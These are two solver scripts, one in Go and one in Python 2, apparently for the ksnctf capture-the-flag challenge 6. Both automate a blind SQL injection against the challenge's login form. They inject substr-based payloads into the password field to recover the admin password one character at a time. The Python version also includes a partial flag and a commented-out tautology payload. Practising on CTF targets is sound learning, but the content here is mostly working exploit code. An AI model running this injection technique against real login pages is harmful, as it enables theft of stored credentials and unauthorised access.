File: ctf/ksnctf/6.go
package main

import (
	"fmt"
	"net/http"
	"net/url"
)

func main() {
	Url := "http://ctfq.sweetduet.info:10080/~q6/"
	tbl := "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789_"
	p := ""
	for i := 0; i < 30; i++ {
		found := false
		for _, c := range tbl {
			ps := fmt.Sprintf("' or substr((SELECT pass FROM user WHERE id='admin'), %d, 1)='%c", len(p)+1, c)
			param := url.Values{}
			param.Set("id", "admin")
			param.Add("pass", ps)
			resp, err := http.PostForm(Url, param)
			if err != nil {
				fmt.Println(err)
			}
			defer resp.Body.Close()
			if resp.ContentLength >= 600 {
				p += string(c)
				fmt.Println("ok", p)
				found = true
				break
			}
		}
		if !found {
			fmt.Println("end")
			break
		}
	}
}

File: ctf/ksnctf/6.py
import urllib, urllib2, json

url = 'http://ctfq.sweetduet.info:10080/~q6/'

#ps = "t' or 't' = 't"


tbl='ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789_'

p="FLAG_KpWa4ji3uZk"
for i in xrange(20):
	found = False
	for c in tbl:
#		q = p + c
#		ps = "' or pass like '" + q + "%' or '"
		ps = "' or substr((SELECT pass FROM user WHERE id='admin'), %d, 1)='%c" % (len(p) + 1, c)
		param={'id':'admin', 'pass':ps}
		req = urllib2.Request('http://ctfq.sweetduet.info:10080/~q6/', urllib.urlencode(param))
		res = urllib2.urlopen(req)
		text = res.read()
		print "try", c
		if len(text) >= 600:
			p += c
			print "ok", p
			found = True
			break
	if not found:
		print "end"
		break
